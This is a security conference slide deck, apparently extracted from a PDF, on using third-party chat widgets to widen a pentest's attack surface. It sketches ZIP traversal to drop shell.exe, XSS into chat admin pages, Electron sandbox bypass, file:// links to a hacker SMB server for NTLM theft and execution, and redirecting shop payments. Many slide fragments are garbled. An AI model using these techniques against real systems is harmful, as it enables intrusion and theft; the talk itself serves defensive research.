ZN Chats PDF

Chat with a hacker
Increase attack surface for Pentest
A talk by Egor Karbutov and Alexey Pertsev

$ Whoarewe
Egor Karbutov & Alexey Pertsev

Penetration testers @Digital Security
Speakers
Bug Hunters
2
Agenda
Chats-Chats-Chats
How does it works?
ZIP old tricks
RCE via ZIP
So much XSS
Electron vulnerability
Scheme file:// for your chats
Payment through chats
Mobile Application Chats
3
Disclaimer
Chat images are taken for examples

All coincidences are accidental
4
Chats-Chats-Chats
What are you talking about?
Another chat?
5
Chats-Chats-Chats
What are you talking about?
Another chat?
7
Chat Types
Browsers CMS
Desktop Application
Mobile SDK
Social Networks
8
Does it help us? Pentest!
Increase attack surface
Social engineering attacks
Vulnerability of own implementations
Vendors vulnerability
User support is on the local network
Lack of segmentation (network)
9
Chat for browsers. How does it works?
JavaScript
CMS = JS
10
JavaScript Privileges
XML HTTP Request
Control of user data
Cookie
Tokens
Sensitive information
HTML replace
Remote update
11
Services
12
Services
12
Services
12
Files
Social engineering attacks?
Will you send an EXE files?
We can use a couple of stupid tricks
with ZIP
13
ZIP Bomb
Hi @sergeybelove
42 Kb from 2014 :)
24 Gb?
322 Gb?
132 Tb?
4.5 Pb
14
ZIP Format
15
ZIP Traversal
16
Lets send a file
api.servise.test
Operator standalone program

User interface
storage.servise.test
17
Lets send a file
api.servise.test

User interface
Sen
di n
gt
he
file
cat.png
17
Lets send a file
api.servise.test

User interface
Sen
di n
gt
he
file
cat.png
cat.png == id
17
Lets send a file
api.servise.test

a g e d
User interface M ess file/i
File h= /
_ p at
file
Sen
di n
gt
he
file
cat.png
cat.png == id
17
Lets send a file
api.servise.test

a g e d file File
User interface M ess file/i _p
ath Mess
File h= / = age
p at /fi
_ le/
file id
Sen
di n
gt
he
file
cat.png
cat.png == id
17
Lets send a file
api.servise.test

a g e d file File
ath Mess
File h= / = age
p at /fi
_ le/
file id
Sen
di n
gt
he
file
Concat(https://storage.service.test', file_path);
cat.png
cat.png == id
17
Lets send a file
api.servise.test

a g e d file File
ath Mess
File h= / = age
p at /fi
_ le/
file id
Sen
di n file
gt d
he n loa
file w
Do Concat(https://storage.service.test', file_path);
GET /file/id HTTP/1.1
Host: storage.service.test
cat.png
cat.png == id
17
Lets send a file
api.servise.test

a g e d file File
ath Mess
%Downloads%/cat.png
File h= / = age
p at /fi
_ le/
file id
Sen
di n file
gt d
he n loa
file w
Host: storage.service.test
cat.png
cat.png == id
17
RCE via File
api.servise.test

User interface
18
RCE via File
api.servise.test

User interface
Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
sa ge Operator standalone program

M es = d
User interface h
File _pat file/
i
file .site/
c k er
a
.h
Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
sa ge Fil
eM Operator standalone program
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id

Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
sa ge Fil
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id

Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
sa ge Fil
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id

storage.servise.test.hacke.site
Sen
di n
gt
he
file
cat.png
18
RCE via File
api.servise.test
sa ge Fil
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id

Sen
di n
gt
he
file
cat.png ../../../../../../../shell.exe == id
18
RCE via File
api.servise.test
sa ge Fil
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id

Sen
di n
gt d file
he l oa
file wn
Host: storage.service.test.hacke.site
18
RCE via File
api.servise.test
sa ge Fil
M es = d .h fil e
User interface h
File _pat file/
i ack e_p ssag %Downloads%/shell.exe
er. ath e
file .site/ tes
k er t/f =
a c ile
.h /id

Sen
di n
gt d file
he l oa
file wn
Host: storage.service.test.hacke.site
18
XSS
XSS is the maximum impact
High level of message security
Not obvious places
Headers
GET/POST parameters for analytics
Our target is Admin page or statistic page
19
Headers for XSS
User-Agent
Referrer
Cookie
Origin
Custom Headers
20
Parameters for XSS
Methods
GET
POST
WebSocket
Keep it simple. Use gray box 21

analysis!
Admin & Statistic Page
Waiting for someone to visit this page
Abuse of complaints against administrators
22
The sad consequences
XSS into chat settings
Appearance customisation
Fonts
Labels
Color
Image
etc
23
Attack scheme 1
Evil Hacker pentest_client.shop.test
24
Attack scheme 1
Evil Hacker pentest_client.shop.test
XSS attack on chat
24
Attack scheme 1
statistic_vendor.chat.test
Evil Hacker pentest_client.shop.test admin_vendor.chat.test
XSS attack on chat
24
Attack scheme 1
XSS attack on
XSS attack on chat client admins
24
Attack scheme 1
XSS attack on
24
Attack scheme 1
XSS attack on
JS code injection
into chat settings
24
Attack scheme 1
XSS attack on
JS code injection
into chat settings
XSS from any

user on the site
24
Attack scheme 1
XSS attack on
JS code injection
into chat settings
pentest_client.shop.test
XSS from any
user on the site
24
Attack scheme 2
chat.vendor statistic.chat.vendor
Evil Hacker admin.chat.vendor
25
Attack scheme 2
XSS attack on chat
25
Attack scheme 2
XSS attack on
XSS attack on chat vendor admins
25
Attack scheme 2
XSS attack on
25
Attack scheme 2
XSS attack on
JS code injection
into chat settings
25
Attack scheme 2
XSS attack on
JS code injection
into chat settings
XSS from any
user on the site
25
Attack scheme 2
XSS attack on
JS code injection
into chat settings
chat.vendor
XSS from any
user on the site
25
Attack scheme 2
XSS attack on
JS code injection
into chat settings
chat.vendor
XSS from any
XSS from any user on the site
user on
chat clients
25
Attack scheme 2
XSS attack on
JS code injection
into chat settings
chat.vendor
statistic_vendor.chat.test XSS from any
XSS from any
admin_vendor.chat.test user on the site
user on
chat.test chat clients
All chat clients services
25
Electron
OpenSource framework to build desktop
apps using HTML, CSS and JavaScript
Electron accomplishes this by combining
Chromium and Node.js into a single
runtime
Chats vendor use Electron for admin
desktop applications
26
Electron Threat Model
Electron Threat Model = Browser Threat Model
Untrusted content from the web
SOP Bypass
Control whether access to Node.js primitives is allowed from
JavaScript
Potential access to Node.js primitives
Limited sandbox
XSS == RCE
https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
https://blog.doyensec.com/2017/08/03/electron-framework-security.html
27
Electron sandbox bypass
nodeIntegration = true
Electron 1.6.7
28
Electron sandbox bypass
nodeIntegration = true
Misconfiguration
SOP bypass via presence of privileged URLs
Switch false
29
File://
Typically used to retrieve files from networks and local disks
Vulnerability in the wild
Local File Inclusion
XXE
SSRF
Windows context
NTLM Hash Stealing
NTLM Relay
RCE
30
Chats with File://
Admin desktop application for Windows

Available scheme file://
Scheme file:// like hyperlink
31
Chats with File://
Pentest in local network
RCE on client device and servers
Weakness & duplicate passwords (local services, servers, client
devices)
pentest_client.shop.test Admin desktop application

Hacker SMB
Hash Cracking
Send file:// link Send NTLM hash
file://hacker.test/
SMB Relay
32
Tricks with File:// 1
What can we do?
File:// with local files
file://C:/Windows/System32/calc.exe
But we cant use arguments
file://C:/Windows/System32/cmd.exe /C calc
All symbols in file link is a path
It is only for social engineering attacks
You can combine this with dir traversal ZIP trick
33
File:// with execute files from the Internet (Hacker SMB server)
file://internet_IP/pwn.exe
34
Chats with File://
Pentest internet service and local network
RCE on client device Admin OS
Social engineering attacks + file://local_files
Admin desktop application

pentest_client.shop.test n g
Hacker SMB i
ut xe
Send file:// link e c e
on execute file Ex ell.
Download sh
file://hacker.test/shell.exe shell.exe
Clicking on the link

35
How to bypass Windows alert window?
This file is in a location outside your local network
Easy, Ill use local addresses
10.0.0.010.255.255.255
172.16.0.0172.31.255.255
192.168.0.0192.168.255.255
No, it isnt work
36
Local network from OS Windows is servers with NetBios name
NetBios name - Domain names without dot
If Ill use NetBios name netbios instead of local IP, I can bypass
that alert
file://netbios/pwn.exe
How?
Smbd (samba) server + responder d netbios I eth0
Working only in local networks
37
Chats with File://
NetBios name trick in local network
Without alert window Admin OS
pentest_client.shop.test Admin desktop application

Hacker SMB g
t in
Send file:// link e cu exe
on execute file Ex ell.
Download sh
file://netbios/pwn.exe shell.exe
Clicking on the link

38
Add payment system
Useful?
Be careful to store a configs!
39
Hacker can buy IPhone for free
Shop backend
40
Shop backend
POST /pay?params=1
shopId
customer
sum
item

40
Shop backend
POST /pay?params=1
shopId
customer
Redirect to payment page
sum
item

40
Shop backend
POST /pay?params=1 YES

checkURL
shopId
customer
sum
item

40
Shop backend

checkURL
shopId
customer
sum
item

Evil Hacker
40
Shop backend

checkURL
shopId
customer av
Redirect to payment page iso
sum IP UR
item ho L
ne
X
Evil Hacker
40
Stealing money for hackers
POST /pay?params=1 Steps to take profit:

Register own shop with similar name
Change shopId via XSS
shopId Call checkURL and avisoURL as needed
customer
sum All payments for hackers !
item

Protection:
Check Yandex Ips
Add anti-CSRF token for config form
DO NOT SHOW ANY PASSWORDS EVER
41
Mobile Application SDK
Custom code for native applications
All code have only one privileges in Mobile OS
3rd party applications have full access in your app
Change theuserinterface
Access to local files in folder app
Access to dynamic user data
Change logic app (like tapjacking)
Vulnerability
Custom implementation
WebView JS manipulation (Android)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
42
ExpensiveWall
ExpensiveWall is spread to different apps as an SDK called
gtk,
ExpensiveWall sends data about the infected device to its C&C
server, including its location and unique identifiers, such as
MAC and IP addresses, IMSI, and IMEI.
Total Downloads infected applications = 5,904,511
https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
43
Dont forget about
Farms that overestimate the rating of applications
Dynamic code execution and code update
JSPatch iOS
Android Runtime
Valid Ad that were vulnerable
Application with fake (Ad) SDK
Code review custom SDK code
44
Conclusion
For pentest and red team
Increase your attack surface via 3rd party services and program library
For you and your project
Think how much you trust other peoples implementations,
applications in your devices, plugins in your program
Dont forget about code review!
All vulnerability are reported and fixed
45
Questions? Or
Special THX to @cherboff and @barracud4_
@ShikariSenpai @_p4lex
Alexey Pertsev
Egor Karbutov

ZN Chats PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

ZN Chats PDF

Uploaded by

Copyright:

Available Formats

Chat with a hacker

Increase attack surface for Pentest

A talk by Egor Karbutov and Alexey Pertsev

Egor Karbutov & Alexey Pertsev

Chat images are taken for examples

Operator standalone program

Operator standalone program

Operator standalone program

Operator standalone program

Operator standalone program

Operator standalone program

Operator standalone program

Operator standalone program

Operator standalone program

Operator standalone program

sa ge Operator standalone program

Keep it simple. Use gray box 21

XSS attack on chat

XSS attack on chat

XSS from any

XSS attack on chat

Admin desktop application for Windows

pentest_client.shop.test Admin desktop application

Admin desktop application

Clicking on the link

Working only in local networks

pentest_client.shop.test Admin desktop application

Clicking on the link

Be careful to store a configs!

POST /pay?params=1 YES

POST /pay?params=1 YES

POST /pay?params=1 YES

POST /pay?params=1 Steps to take profit:

All vulnerability are reported and fixed

You might also like